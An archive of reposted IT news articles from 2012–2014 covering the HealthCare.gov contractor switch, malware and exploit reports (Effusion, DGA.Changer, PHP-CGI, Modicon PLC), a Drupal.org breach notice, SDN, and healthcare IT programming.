Archive for the ‘Programming’ Category

Feds to dump CGI from project

Monday, January 13th, 2014

The Obama Administration is set to fire CGI Federal as prime IT contractor of the problem-plagued website, a report says.

The government now plans to hire IT consulting firm Accenture to fix the Affordable Care Act (ACA) website’s lingering performance problems, the Washington Post reported today. Accenture will get a 12-month, $90 million contract to update the website, the newspaper reported.

The site is the main portal for consumers to sign up for new insurance plans under the Affordable Care Act.

CGI’s contract is due for renewal in February. The terms of the agreement included options for the U.S. to renew it for one more year and then another two more after that.

The decision not to renew comes as frustration grows among officials of the Centers for Medicare and Medicaid Services (CMS), which oversees the ACA, about the pace and quality of CGI’s work, the Post said, quoting unnamed sources. About half of the software fixes written by CGI engineers in recent months have failed on first attempt to use them, CMS officials told the Post.

The government awarded the contract to Accenture on a sole-source, or no-bid, basis because the CGI contract expires at the end of next month. That gives Accenture less than two months to familiarize itself with the project before it takes over the complex task of fixing numerous remaining glitches.

CGI did not immediately respond to Computerworld’s request for comment.

In an email, an Accenture spokesman declined to confirm or deny the report.

“Accenture Federal Services is in discussions with clients and prospective clients all the time, but it is not appropriate to discuss new business opportunities we may or may not be pursuing,” the spokesman said The decision to replace CGI comes as performance of the website appears to be steadily improving after its spectacularly rocky Oct. 1.

A later post mortem of the debacle showed that servers did not have the right production data, third party systems weren’t connecting as required, dashboards didn’t have data and there simply wasn’t enough server capacity to handle traffic.

Though CGI had promised to have the site ready and fully functional by Oct. 1, between 30% and 40% of the site had yet to be completed at the time. The company has taken a lot of the heat since.

Ironically, the company has impressive credentials. The company is nowhere as big as some of the biggest government IT contractors but still is only one of 10 companies in the U.S. to have achieved the highest level Capability Maturity Model Integration (CMMI) level for software development certification.

CGI Federal is a subsidiary of Montreal-based CGI Group. CMS hired the company as the main IT contractor for in 2011 under an $88 million contract. So far, the firm has received about $113 million for its work on the site.


Cyber criminals offer malware for Nginx, Apache Web servers

Thursday, December 26th, 2013

A new malware program that functions as a module for the Apache and Nginx Web servers is being sold on cybercrime forums, according to researchers from security firm IntelCrawler.

The malware is called Effusion and according to the sales pitch seen by IntelCrawler, a start-up firm based in Los Angeles that specializes in cybercrime intelligence, it can inject code in real time into websites hosted on the compromised Web servers. By injecting content into a website, attackers can redirect visitors to exploits or launch social engineering attacks.

The Effusion module works with Nginx from version 0.7 up to the latest stable version, 1.4.4, and with Apache running on 32- and 64-bit versions of Linux and FreeBSD. ModulModules extend Apache’s and Nginx’s core functionality.

The malware can inject rogue code into static content of certain MIME types, including JavaScript and HTML, and in PHP templates at the start, end or after a specific tag. Attackers can push configuration updates and control code modifications remotely.

Filters can also be used to restrict when the injection happens. Effusion supports filtering by referrer header, which can be used to target only visitors that come from specific websites; by User-Agent header, which can be used to target users of specific browsers and by IP address or address range.

The malware can check whether it has root access, something that could allow the attackers greater control over the underlying system. It can also delete the injected content when suspicious processes are detected in order to hide itself, Andrey Komarov, IntelCrawler’s CEO, said via email.

The Effusion authors offer precompiled builds for $2,500 per build and plan to vet buyers, Komarov said. This suggests they’re interested in selling it only to a limited number of people so they can continue to offer support and develop the malware at the same time, he said.

While this is not the first malware to function as an Apache module, it is one of the very few so far to also target Nginx, a high-performance Web server that has grown considerably in popularity in recent years.

According to a December Web server survey by Internet services firm Netcraft, Nginx is the third most widely used Web server software after Apache and Microsoft IIS, and has a market share of over 14%. Because it’s built to handle high numbers of concurrent connections, it is used to host heavily trafficked websites including Netflix, Hulu, Pinterest, CloudFlare, Airbnb,, GitHub and SoundCloud.


Unique malware evades sandboxes

Thursday, December 19th, 2013

Malware used in attack on PHP last month dubbed DGA.Changer

Malware utilized in the attack last month on the developers’ site used a unique approach to avoid detection, a security expert says.

On Wednesday, security vendor Seculert reported finding that one of five malware types used in the attack had a unique cloaking property for evading sandboxes. The company called the malware DGA.Changer.

DGA.Changer’s only purpose was to download other malware onto infected computers, Aviv Raff, chief technology officer for Seculert, said on the company’s blog. Seculert identified 6,500 compromised computers communicating with the malware’s command and control server. Almost 60 percent were in the United States.

What Seculert found unique was how the malware could receive a command from a C&C server to change the seed of the software’s domain generation algorithm. The DGA periodically generates a large number of domain names as potential communication points to the C&C server, thereby making it difficult for researchers and law enforcement to find the right domain and possibly shutdown the botnet.

“What the attackers behind DGA did is basically change the algorithm on the fly, so they can tell the malware to create a new stream of domains automatically,” Raff told CSOonline.

When the malware generates the same list of domains, it can be detected in the sandbox where security technology will isolate suspicious files. However, changing the algorithm on demand means that the malware won’t be identified.

“This is a new capability that didn’t exist before,” Raff said. “This capability allows the attacker to bypass sandbox technology.”

Hackers working for a nation-state targeting specific entities, such as government agencies, think tanks or international corporations, would use this type of malware, according to Raff. Called advanced persistent threats, these hackers tend to use sophisticated attack tools.

An exploit kit that served five different malware types was used in compromising two servers of, a site for downloads and documentation related to the PHP general-purpose scripting language used in Web development. Google spotted four pages on the site serving malicious JavaScript that targeted personal computers, but ignored mobile devices.

The attack was noteworthy because of the number of visitors to, which is in the top 250 domains on the Internet, according to Alexa rankings.

To defend against DGA.Changer, companies would need a tool that looks for abnormal behavior in network traffic. The malware tends to generate unusual traffic by querying lots of domains in search of the one leading to the C&C server.

“Because this malware will try to go to different domains, it will generate suspicious traffic,” Raff said.

Seculert did not find any evidence that would indicate who was behind the attack.

“This is a group that’s continuously updating this malicious software, so this is a work in progress,” Raff said.


Google’s Dart language heads for standardization with new Ecma committee

Friday, December 13th, 2013

Ecma, the same organization that governs the standardization and development of JavaScript (or “EcmaScript” as it’s known in standardese), has created a committee to oversee the publication of a standard for Google’s alternative Web language, Dart.

Technical Committee 52 will develop standards for Dart language and libraries, create test suites to verify conformance with the standards, and oversee Dart’s future development. Other technical committees within Ecma perform similar work for EcmaScript, C#, and the Eiffel language.

Google released version 1.0 of the Dart SDK last month and believes that the language is sufficiently stable and mature to be both used in a production capacity and put on the track toward creating a formal standard. The company asserts that this will be an important step toward embedding native Dart support within browsers.


HP: 90 percent of Apple iOS mobile apps show security vulnerabilities

Tuesday, November 19th, 2013

HP today said security testing it conducted on more than 2,000 Apple iOS mobile apps developed for commercial use by some 600 large companies in 50 countries showed that nine out of 10 had serious vulnerabilities.

Mike Armistead, HP vice president and general manager, said testing was done on apps from 22 iTunes App Store categories that are used for business-to-consumer or business-to-business purposes, such as banking or retailing. HP said 97 percent of these apps inappropriately accessed private information sources within a device, and 86 percent proved to be vulnerable to attacks such as SQL injection.

The Apple guidelines for developing iOS apps help developers but this doesn’t go far enough in terms of security, says Armistead. Mobile apps are being used to extend the corporate website to mobile devices, but companies in the process “are opening up their attack surfaces,” he says.

In its summary of the testing, HP said 86 percent of the apps tested lacked the means to protect themselves from common exploits, such as misuse of encrypted data, cross-site scripting and insecure transmission of data.

The same number did not have optimized security built in the early part of the development process, according to HP. Three quarters “did not use proper encryption techniques when storing data on mobile devices, which leaves unencrypted data accessible to an attacker.” A large number of the apps didn’t implement SSL/HTTPS correctly.To discover weaknesses in apps, developers need to involve practices such as app scanning for security, penetration testing and a secure coding development life-cycle approach, HP advises.

The need to develop mobile apps quickly for business purposes is one of the main contributing factors leading to weaknesses in these apps made available for public download, according to HP. And the weakness on the mobile side is impacting the server side as well.

“It is our earnest belief that the pace and cost of development in the mobile space has hampered security efforts,” HP says in its report, adding that “mobile application security is still in its infancy.”

Source: code allegedly two times larger than Facebook, Windows, and OS X combined

Thursday, October 24th, 2013
(Credit: KAREN BLEIER/AFP/Getty Images) is in shambles. Republicans, on the heels of the House’s failure to gut the Affordable Care Act (ACA), are whipping up a firestorm of criticism. Health Secretary Kathleen Sebelius is facing calls for resignation, and critics — and satirists — are asking everyone from ex-fugitive John McAfee to Edward Snowden to weigh in on the issues.

The latest controversy revolves around The New York Times’ reporting that roughly 1 percent of — or 5 million lines of code — would need to be rewritten, putting the Web site’s total size at a mind-boggling 500 million lines of code — a scale that suggests months upon months of work.

Some are naturally skeptical of that ridiculous-sounding number — as well as the credibility of The New York Times’ source, who remains unnamed. Forums of programmers on sites like Reddit have postulated that, if true, it would have to involve mounds of bloated legacy code from past systems — making it one of the largest Web systems ever built. One developer, Alex Marchant of Orange, Calif., decided to draw an interesting comparison to point that out.

Marchant’s chart included, which he says nears 75 million lines of code, but it’s likely larger due to his source’s exclusion of back-end components; OS X 10.4 Tiger; and Windows XP. Still, at 500 million lines is more than two times larger than all three combined.

(Credit: Alex Marchant)

For further perspective, makers of the multiplayer online game World of Warcraft regularly maintain 5.5 million lines of code for the game’s more than 7 million subscribers. How about the code that runs a gigantic, multinational bank? The Bank of New York Mellon, the oldest banking corporation in the US and the largest deposit bank in the world with close to $30 trillion in total assets, has a system built upon 112,500 Cobol programs, which amounts to 343 million lines of code.

Those examples are enough to make you think something is amiss in the 500 million figure. Still, it would come as no surprise if — plugged into thousands of outdated systems, containing countless redundancies, and rushed out the door with little technical oversight — were, in fact, the most bloated piece of software to ever hit the Web.

Source:  CNET


US FDA to regulate only medical apps that could be risky if malfunctioning

Tuesday, September 24th, 2013

The FDA said the mobile platform brings its own unique risks when used for medical applications

The U.S. Food and Drug Administration intends to regulate only mobile apps that are medical devices and could pose a risk to a patient’s safety if they do not function as intended.

Some of the risks could be unique to the choice of the mobile platform. The interpretation of radiological images on a mobile device could, for example, be adversely affected by the smaller screen size, lower contrast ratio and uncontrolled ambient light of the mobile platform, the agency said in its recommendations released Monday. The FDA said it intends to take the “risks into account in assessing the appropriate regulatory oversight for these products.”

The nonbinding recommendations to developers of mobile medical apps only reflects the FDA’s current thinking on the topic, the agency said. The guidance document is being issued to clarify the small group of mobile apps which the FDA aims to scrutinize, it added.

The recommendations would leave out of FDA scrutiny a majority of mobile apps that could be classified as medical devices but pose a minimal risk to consumers, the agency said.

The FDA said it is focusing its oversight on mobile medical apps that are to be used as accessories to regulated medical devices or transform a mobile platform into a regulated medical device such as an electrocardiography machine.

“Mobile medical apps that undergo FDA review will be assessed using the same regulatory standards and risk-based approach that the agency applies to other medical devices,” the agency said.

It also clarified that its oversight would be platform neutral. Mobile apps to analyze and interpret EKG waveforms to detect heart function irregularities would be considered similar to software running on a desktop computer that serves the same function, which is already regulated.

“FDA’s oversight approach to mobile apps is focused on their functionality, just as we focus on the functionality of conventional devices. Our oversight is not determined by the platform,” the agency said in its recommendations.

The FDA has cleared about 100 mobile medical applications over the past decade of which about 40 were cleared in the past two years. The draft of the guidance was first issued in 2011.


Will software-defined networking kill network engineers’ beloved CLI?

Tuesday, September 3rd, 2013

Networks defined by software may require more coding than command lines, leading to changes on the job

SDN (software-defined networking) promises some real benefits for people who use networks, but to the engineers who manage them, it may represent the end of an era.

Ever since Cisco made its first routers in the 1980s, most network engineers have relied on a CLI (command-line interface) to configure, manage and troubleshoot everything from small-office LANs to wide-area carrier networks. Cisco’s isn’t the only CLI, but on the strength of the company’s domination of networking, it has become a de facto standard in the industry, closely emulated by other vendors.

As such, it’s been a ticket to career advancement for countless network experts, especially those certified as CCNAs (Cisco Certified Network Associates). Those network management experts, along with higher level CCIEs (Cisco Certified Internetwork Experts) and holders of other official Cisco credentials, make up a trained workforce of more than 2 million, according to the company.

A CLI is simply a way to interact with software by typing in lines of commands, as PC users did in the days of DOS. With the Cisco CLI and those that followed in its footsteps, engineers typically set up and manage networks by issuing commands to individual pieces of gear, such as routers and switches.

SDN, and the broader trend of network automation, uses a higher layer of software to control networks in a more abstract way. Whether through OpenFlow, Cisco’s ONE (Open Network Environment) architecture, or other frameworks, the new systems separate the so-called control plane of the network from the forwarding plane, which is made up of the equipment that pushes packets. Engineers managing the network interact with applications, not ports.

“The network used to be programmed through what we call CLIs, or command-line interfaces. We’re now changing that to create programmatic interfaces,” Cisco Chief Strategy Officer Padmasree Warrior said at a press event earlier this year.

Will SDN spell doom for the tool that network engineers have used throughout their careers?

“If done properly, yes, it should kill the CLI. Which scares the living daylights out of the vast majority of CCIEs,” Gartner analyst Joe Skorupa said. “Certainly all of those who define their worth in their job as around the fact that they understand the most obscure Cisco CLI commands for configuring some corner-case BGP4 (Border Gateway Protocol 4) parameter.”

At some of the enterprises that Gartner talks to, the backlash from some network engineers has already begun, according to Skorupa.

“We’re already seeing that group of CCIEs doing everything they can to try and prevent SDN from being deployed in their companies,” Skorupa said. Some companies have deliberately left such employees out of their evaluations of SDN, he said.

Not everyone thinks the CLI’s days are numbered. SDN doesn’t go deep enough to analyze and fix every flaw in a network, said Alan Mimms, a senior architect at F5 Networks.

“It’s not obsolete by any definition,” Mimms said. He compared SDN to driving a car and CLI to getting under the hood and working on it. For example, for any given set of ACLs (access control lists) there are almost always problems for some applications that surface only after the ACLs have been configured and used, he said. A network engineer will still have to use CLI to diagnose and solve those problems.

However, SDN will cut into the use of CLI for more routine tasks, Mimms said. Network engineers who know only CLI will end up like manual laborers whose jobs are replaced by automation. It’s likely that some network jobs will be eliminated, he said.

This isn’t the first time an alternative has risen up to challenge the CLI, said Walter Miron, a director of technology strategy at Canadian service provider Telus. There have been graphical user interfaces to manage networks for years, he said, though they haven’t always had a warm welcome. “Engineers will always gravitate toward a CLI when it’s available,” Miron said.

Even networking startups need to offer a Cisco CLI so their customers’ engineers will know how to manage their products, said Carl Moberg, vice president of technology at Tail-F Systems. Since 2005, Tail-F has been one of the companies going up against the prevailing order.

It started by introducing ConfD, a graphical tool for configuring network devices, which Cisco and other major vendors included with their gear, according to Moberg. Later the company added NCS (Network Control System), a software platform for managing the network as a whole. To maintain interoperability, NCS has interfaces to Cisco’s CLI and other vendors’ management systems.

CLIs have their roots in the very foundations of the Internet, according to Moberg. The approach of the Internet Engineering Task Force, which oversees IP (Internet Protocol) has always been to find pragmatic solutions to defined problems, he said. This detailed-oriented “bottom up” orientation was different from the way cellular networks were designed. The 3GPP, which developed the GSM standard used by most cell carriers, crafted its entire architecture at once, he said.

The IETF’s approach lent itself to manual, device-by-device administration, Moberg said. But as networks got more complex, that technique ran into limitations. Changes to networks are now more frequent and complex, so there’s more room for human error and the cost of mistakes is higher, he said.

“Even the most hardcore Cisco engineers are sick and tired of typing the same commands over and over again and failing every 50th time,” Moberg said. Though the CLI will live on, it will become a specialist tool for debugging in extreme situations, he said.

“There’ll always be some level of CLI,” said Bill Hanna, vice president of technical services at University of Pittsburgh Medical Center. At the launch earlier this year of Nuage Networks’ SDN system, called Virtualized Services Platform, Hanna said he hoped SDN would replace the CLI. The number of lines of code involved in a system like VSP is “scary,” he said.

On a network fabric with 100,000 ports, it would take all day just to scroll through a list of the ports, said Vijay Gill, a general manager at Microsoft, on a panel discussion at the GigaOm Structure conference earlier this year.

“The scale of systems is becoming so large that you can’t actually do anything by hand,” Gill said. Instead, administrators now have to operate on software code that then expands out to give commands to those ports, he said.

Faced with these changes, most network administrators will fall into three groups, Gartner’s Skorupa said.

The first group will “get it” and welcome not having to troubleshoot routers in the middle of the night. They would rather work with other IT and business managers to address broader enterprise issues, Skorupa said. The second group won’t be ready at first but will advance their skills and eventually find a place in the new landscape.

The third group will never get it, Skorupa said. They’ll face the same fate as telecommunications administrators who relied for their jobs on knowing obscure commands on TDM (time-division multiplexing) phone systems, he said. Those engineers got cut out when circuit-switched voice shifted over to VoIP (voice over Internet Protocol) and went onto the LAN.

“All of that knowledge that you had amassed over decades of employment got written to zero,” Skorupa said. For IP network engineers who resist change, there will be a cruel irony: “SDN will do to them what they did to the guys who managed the old TDM voice systems.”

But SDN won’t spell job losses, at least not for those CLI jockeys who are willing to broaden their horizons, said analyst Zeus Kerravala of ZK Research.

“The role of the network engineer, I don’t think, has ever been more important,” Kerravala said. “Cloud computing and mobile computing are network-centric compute models.”

Data centers may require just as many people, but with virtualization, the sharply defined roles of network, server and storage engineer are blurring, he said. Each will have to understand the increasingly interdependent parts.

The first step in keeping ahead of the curve, observers say, may be to learn programming.

“The people who used to use CLI will have to learn scripting and maybe higher-level languages to program the network, or at least to optimize the network,” said Pascale Vicat-Blanc, founder and CEO of application-defined networking startup Lyatiss, during the Structure panel.

Microsoft’s Gill suggested network engineers learn languages such as Python, C# and PowerShell.

For Facebook, which takes a more hands-on approach to its infrastructure than do most enterprises, that future is now.

“If you look at the Facebook network engineering team, pretty much everybody’s writing code as well,” said Najam Ahmad, Facebook’s director of technical operations for infrastructure.

Network engineers historically have used CLIs because that’s all they were given, Ahmad said. “I think we’re underestimating their ability. ”

Cisco is now gearing up to help its certified workforce meet the newly emerging requirements, said Tejas Vashi, director of product management for Learning@Cisco, which oversees education, testing and certification of Cisco engineers.

With software automation, the CLI won’t go away, but many network functions will be carried out through applications rather than manual configuration, Vashi said. As a result, network designers, network engineers and support engineers all will see their jobs change, and there will be a new role added to the mix, he said.

In the new world, network designers will determine network requirements and how to fulfill them, then use that knowledge to define the specifications for network applications. Writing those applications will fall to a new type of network staffer, which Learning@Cisco calls the software automation developer. These developers will have background knowledge about networking along with skills in common programming languages such as Java, Python, and C, said product manager Antonella Como. After the software is written, network engineers and support engineers will install and troubleshoot it.

“All these people need to somewhat evolve their skills,” Vashi said. Cisco plans to introduce a new certification involving software automation, but it hasn’t announced when.

Despite the changes brewing in networks and jobs, the larger lessons of all those years typing in commands will still pay off for those who can evolve beyond the CLI, Vashi and others said.

“You’ve got to understand the fundamentals,” Vashi said. “If you don’t know how the network infrastructure works, you could have all the background in software automation, and you don’t know what you’re doing on the network side.”


Important security update: Reset your password

Thursday, May 30th, 2013

The Security Team and Infrastructure Team has discovered unauthorized access to account information on and

This access was accomplished via third-party software installed on the server infrastructure, and was not the result of a vulnerability within Drupal itself. This notice applies specifically to user account data stored on and, and not to sites running Drupal generally.

Information exposed includes usernames, email addresses, and country information, as well as hashed passwords. However, we are still investigating the incident and may learn about other types of information compromised, in which case we will notify you accordingly. As a precautionary measure, we’ve reset all account holder passwords and are requiring users to reset their passwords at their next login attempt. A user password can be changed at any time by taking the following steps.

  1. Go to
  2. Enter your username or email address.
  3. Check your email and follow the link to enter a new password.
    • It can take up to 15 minutes for the password reset email to arrive. If you do not receive the e-mail within 15 minutes, make sure to check your spam folder as well.

All passwords are both hashed and salted, although some older passwords on some subsites were not salted.

See below recommendations on additional measure that you can take to protect your personal information.

What happened?

Unauthorized access was made via third-party software installed on the server infrastructure, and was not the result of a vulnerability within Drupal itself. We have worked with the vendor to confirm it is a known vulnerability and has been publicly disclosed. We are still investigating and will share more detail when it is appropriate. Upon discovering the files during a security audit, we shut down the website to mitigate any possible ongoing security issues related to the files. The Drupal Security Team then began forensic evaluations and discovered that user account information had been accessed via this vulnerability.

The suspicious files may have exposed profile information like username, email address, hashed password, and country. In addition to resetting your password on, we are also recommending a number of measures (below) for further protection of your information, including, among others, changing or resetting passwords on other sites where you may use similar passwords.

What are we doing about it?

We take security very seriously on As attacks on high-profile sites (regardless of the software they are running) are common, we strive to continuously improve the security of all sites.

To that end, we have taken the following steps to secure the infrastructure:

  • Staff at the OSU Open Source Lab (where is hosted) and the infrastructure teams rebuilt production, staging, and development webheads and GRSEC secure kernels were added to most servers
  • We are scanning and have not found any additional malicious or dangerous files and we are making scanning a routine job in our process
  • There are many subsites on including older sites for specific events. We created static archives of those sites.

We would also like to acknowledge that we are conducting an investigation into the incident, and we may not be able to immediately answer all of the questions you may have. However, we are committed to transparency and will report to the community once we have an investigation report.

If you find that any reason to believe that your information has been accessed by someone other than yourself, please contact the Drupal Association immediately by sending an email to We regret this occurred and want to assure you we are working hard to improve security.

Excerpt from:

Node.js integrates with M: Next big thing in healthcare IT

Thursday, February 7th, 2013

Join the M revolution and the next big thing in healthcare IT: the integration of the node.js programming language with the NoSQL hierarchical database, M.

M was developed to organize and access with high efficiency the type of data that is typically managed in healthcare, thus making it uniquely well-suited for the job.

One of the biggest reasons for the success of M is that it integrates the database into the language in a natural and seamless way. The growth and involvement of the community of M developers however, has been below the radar for educators and the larger IT community. As a consequence it has been facing challenges for recruiting young new developers, despite the critical importance of this technology for supporting the Health IT infrastructure of the US.

At the recent 26th VistA Community Meeting, an exciting alternative was presented by Rob Tweed. I summarize it as: Node.js meets the M Database.

In his work, Rob has created an intimate integration between the M database and the language features of node.js. The result is a new way of accessing the M database from JavaScript code in such a way that the developer doesn’t feel that is accessing a database.

It is now possible to access M from node.js, both when using the M implementation of Intersystems Cache and with the open source M implementation of GT.M. This second interface was implemented by David Wicksell, based on the API previously defined for Cache in the GlobalsDB project.

In a recent blog post, Rob describes some of the natural notation in node.js that provides access to the M hierarchical database by nicely following the language patterns of JavaScript. Here are some of Rob’s examples:

The M expression:

set town = ^patient(123456, "address", "town")

becomes the JavaScript expression:

 var town = patient.$('address').$('town')._value;

with some flavor of jQuery.

The following M expression of a healthcare typical example:

^patient(123456,"conditions",0,"description")="Diagnosis, Active: Hospital Measures - AMI (Code List: 2.16.840.1.113883.3.666.5.3011)"

becomes the following JSON datastructure that can be manipulated with Javascript:

var patient = new ewd.GlobalNode("patient", [123456]);

var document = {
  "birthdate": -851884200,
  "conditions": [
      "causeOfDeath": null,
      "codes": {
        "ICD-9-CM": [
        "ICD-10-CM": [
      "description": "Diagnosis, Active: Hospital Measures - AMI (Code List: 2.16.840.1.113883.3.666.5.3011)",
      "end_time": 1273104000

More detailed examples are provided in Rob’s blog post. The M module for node.js is available here.

What this achieves is seamless integration between the powerful M hierarchical database and the language features of the very popular node.js implementation of JavaScript. This integration becomes a great opportunity for hundreds of node.js developers to join the space of healthcare IT, and to do, as Tim O’Reilly advises: Work on Stuff that Matters!

M is currently being used in hundreds of hospitals in the public sector:

  • The Department of Veterans Affairs
  • The Department of Defense
  • The Indian Health Service

As well as hundreds of hospitals in the private sector:

  • Kaiser Permanente hospital system
  • Johns Hopkins
  • Beth Israel Deaconess Medical Center
  • Harvard Medical School

In particular at deployments of these EHR systems:

  • Epic
  • GE/Centricity
  • McKesson
  • Meditech

Given this, and the large popularity of JavaScript and the high efficiency of node.js, this may be the most significant event happening in healthcare IT in recent years.

If you are an enthusiast of node.js, or you are looking for the best next language to learn, or you want to do some social good, this could be the thing for you.


Microsoft opens up access to cloud-based ALM server

Monday, June 11th, 2012

The Team Foundation Service, which had been invitation-only, is now open to anyone, but it still is in preview mode

Microsoft is expanding access to its cloud-based application lifecycle management service, although the service still remains in preview mode.

At its TechEd conference in Orlando, Fla. Monday, the company will announce that anyone can utilize its Team Foundation Service ALM server, which is hosted on Microsoft’s Windows Azure cloud. First announced last September, the preview had been limited to invitation-only usage. Since it remains in a preview phase, the service can be used free of charge.

“Anybody who wants to try it can try it,” said Brian Harry, Microsoft technical fellow and product line manager for Team Foundation Server, the behind-the-firewall version of the ALM server. Developers can access Team Foundation Service at the Team Foundation Service preview site.

Through the cloud ALM service, developers can plan projects, collaborate, and manage code online. Code is checked into the cloud using the Visual Studio or Eclipse IDEs. Languages ranging from C# to Python are supported, as are such platforms as Windows and Android.

With Team Foundation Service, Microsoft expects to compete with rival tools like Atlassian Jira. “Team Foundation Service is a full application lifecycle management product that provides a rich set of capabilities from early project planning and management through development, testing, and deployment,” Harry said. “We’ve got the most comprehensive ALM tool in the market, and it is simple and easy to use and easy to get started.” Eventually, Microsoft will charge for use of Team Foundation Service, but it will not happen this year, Harry said.

Microsoft has been adding capabilities to Team Foundation Service every three weeks. A new continuous deployment feature enables applications to be deployed to Azure automatically. A build service was added in March. On Monday, Microsoft will announce the addition of a rich landing page with more information about the product.


Attackers target unpatched PHP bug allowing malicious code execution

Tuesday, May 8th, 2012

Installing this 13-line patch is one of the steps security researchers suggest webmasters follow immediately to prevent attacks that exploit an unpatched vulnerability in the PHP scripting language.

A huge number of websites around the world are endangered by an unpatched vulnerability in the PHP scripting language that attackers are already trying to exploit to remotely take control of underlying servers, security researchers warned.

The code-execution attacks threaten PHP websites only when they run in common gateway interface (CGI) mode, Darian Anthony Patrick, a Web application security consultant with Criticode, told Ars. Sites running PHP in FastCGI mode aren’t affected. Nobody knows exactly how many websites are at risk, because sites also must meet several other criteria to be vulnerable, including not having a firewall that blocks certain ports. Nonetheless, sites running CGI-configured PHP on the Apache webserver are by default vulnerable to attacks that make it easy for hackers to run code that plants backdoors or downloads files containing sensitive user data.

Making matters worse, full details of the bug became public last week, giving attackers everything they need to locate and exploit vulnerable websites.

“The huge issue is the remote code execution, and that’s really easy to figure out how to do,” Patrick said. “If I as an attacker found it existed on a particular site, it would be exciting because I own everything. It’s the kind of vulnerability where it’s probably not super prevalent, but if it’s there, it’s not a minor thing.”

According to security researcher Ryan Barnett, exploits are already being attempted against servers that are part of a honeypot set up by Trustwave’s Spider Labs to detect Web-based attacks. While some of the Web requests observed appear to be simple probes designed to see if sites are vulnerable, others contain remote file inclusion parameters that attempt to execute code of the attacker’s choosing on vulnerable servers.

“Because this is honeypot stuff and we’re not actually running all of these live applications, we can’t be sure what I’m showing actually would work,” Barnett told Ars. “We just wanted to show that yes, bad guys are actively scanning for this.”

In a series of Twitter dispatches made in response to this article, blogger Trevor Pott said he’s seeing a dozen such attack attempts every hour against smaller websites including his own, They appear to be made by infected computers located in the US and China for the purpose of seeding them with malware used in drive-by download attacks.

What’s more, the open-source Metasploit framework used by hackers and penetration testers to exploit known vulnerabilities has been updated to include the exploit, providing a point-and-click interface for remotely carrying out the code execution attacks. Making matters worse, an update that PHP maintainers released late last week to patch the hole can easily be bypassed, leaving vulnerable websites at risk even after applying the fix.

Patrick said websites that run PHP in CGI mode should install the update anyway and then follow several steps to mitigate their exposure, including applying a second patch published last week by researchers on Barnett’s post also includes steps webmasters can follow to protect themselves against exploits.

HD Moore, the CSO of Rapid7 and the Metasploit chief architect who wrote the PHP-CGI module, agreed with Patrick that the percentage of sites vulnerable to the bug is probably small. But he went on to say the installed base of PHP is so big and the damage to those who are susceptible to attack is so large that admins should take immediate steps to lock down their systems right away. He also said it’s likely that attacks could last for months or years because of the difficulty many administrators have in updating.

“I wouldn’t be surprised if we continue to see this bug exploited in the wild for two or three years, because it will take a while for people to patch their systems,” he told Ars. “There are a lot crusty old boxes out there running old versions of PHP, and if those are configured as CGI it’s going to affect it.”


Researchers release new exploits to hijack critical infrastructure

Friday, April 6th, 2012

Researchers have released two new exploits that attack common design vulnerabilities in a computer component used to control critical infrastructure, such as refineries and factories.

The exploits would allow someone to hack the system in a manner similar to how the Stuxnet worm attacked nuclear centrifuges in Iran, a hack that stunned the security world with its sophistication and ability to use digital code to create damage in the physical world.

The exploits attack the Modicon Quantum programmable logic controller made by Schneider-Electric, which is a key component used to control functions in critical infrastructures around the world, including manufacturing facilities, water and wastewater management plants, oil and gas refineries and pipelines, and chemical production plants. The Schneider PLC is an expensive system that costs about $10,000.

One of the exploits allows an attacker to simply send a “stop” command to the PLC.

The other exploit replaces the ladder logic in a Modicon Quantum PLC so that an attacker can take control of the PLC.

The module first downloads the current ladder logic on the PLC so that the attacker can understand what the PLC is doing. It then uploads a substitute ladder logic to the PLC, which automatically overwrites the ladder logic on the PLC. The module in this case only overwrites the legitimate ladder logic with blank ladder logic, to provide a proof of concept demonstration of how an attacker could easily replace the legitimate ladder logic with malicious commands without actually sabotaging the device.

The exploits take advantage of the fact that the Modicon Quantum PLC doesn’t require a computer that is communicating with it to authenticate itself or any commands it sends to the PLC—essentially trusting any computer that can talk to the PLC. Without such protection, an unauthorized party with network access can send the device malicious commands to seize control of it, or simply send a “stop” command to halt the system from operating.

The attack code was created by Reid Wightman, an ICS security researcher with Digital Bond, a computer security consultancy that specializes in the security of industrial control systems. The company said it released the exploits to demonstrate to owners and operators of critical infrastructures that “they need to demand secure PLC’s from vendors and develop a near-term plan to upgrade or replace their PLCs.”

The exploits were released as modules in Metasploit, a penetration testing tool owned by Rapid 7 that is used by computer security professionals to quickly and easily test their networks for specific security holes that could make them vulnerable to attack.

The exploits were designed to demonstrate the “ease of compromise and potential catastrophic impact” of vulnerabilities and make it possible for owners and operators of critical infrastructure to “see and know beyond any doubt the fragility and insecurity of these devices,” said Digital Bond CEO Dale Peterson in a statement.

But Metasploit is also used by hackers to quickly find and gain access to vulnerable systems. Peterson has defended his company’s release of exploits in the past as a means of pressuring companies like Schneider into fixing serious design flaws and vulnerabilities they’ve long known about and neglected to address.

Peterson and other security researchers have been warning for years that industrial control systems contain security issues that make them vulnerable to hacking. But it wasn’t until the Stuxnet worm hit Iran’s nuclear facilities in 2010 that industrial control systems got widespread attention. The makers of PLCs, however, have still taken few steps to secure their systems.

“[M]ore than 500 days after Stuxnet the Siemens S7 has not been fixed, and Schneider and many other ICS vendors have ignored the issues as well,” Peterson said.

Stuxnet, which attacked a PLC model made by Siemens in order to sabotage centrifuges used in Iran’s uranium enrichment program, exploited the fact that the Siemens PLC, like the Schneider PLC, does not require any authentication to upload rogue ladder logic to it, making it easy for the attackers to inject their malicious code into the system.

Peterson launched a research project last year dubbed Project Basecamp, to uncover security vulnerabilities in widely used PLCs made by multiple manufacturers.

In January, the team disclosed several vulnerabilities they found in the Modicon Quantum system, including the lack of authentication and the presence of about 12 backdoor accounts that were hard coded into the system and that have read/write capability. The system also has a web server password that is stored in plaintext and is retrievable via an FTP backdoor.

At the time of their January announcement, the group released exploit modules that attacked vulnerabilities in some of the other products, and have gradually been releasing exploits for other products since then.


Is application security the glaring hole in your defense?

Tuesday, March 27th, 2012

When it comes to security, a large number of organizations have a glaring hole in their defenses: their applications.

A recent study of more than 800 IT security and development professionals reports that most organizations don’t prioritize application security as a discipline, despite the fact that SQL injection attacks are the highest root cause of data breaches. The second-highest root cause is exploited vulnerable code in Web 2.0/social media applications.

Sixty-eight percent of developers’ organizations and 47 percent of security practitioners’ organizations suffered one or more data breaches in the past 24 months due to hacked or compromised applications. A further 19 percent of security practitioners and 16 percent of developers were uncertain if their organization had suffered a data breach due to a compromised or hacked application. Additionally, only 12 percent of security practitioners and 11 percent of developers say all their organizations’ applications meet regulations for privacy, data protection and information security.

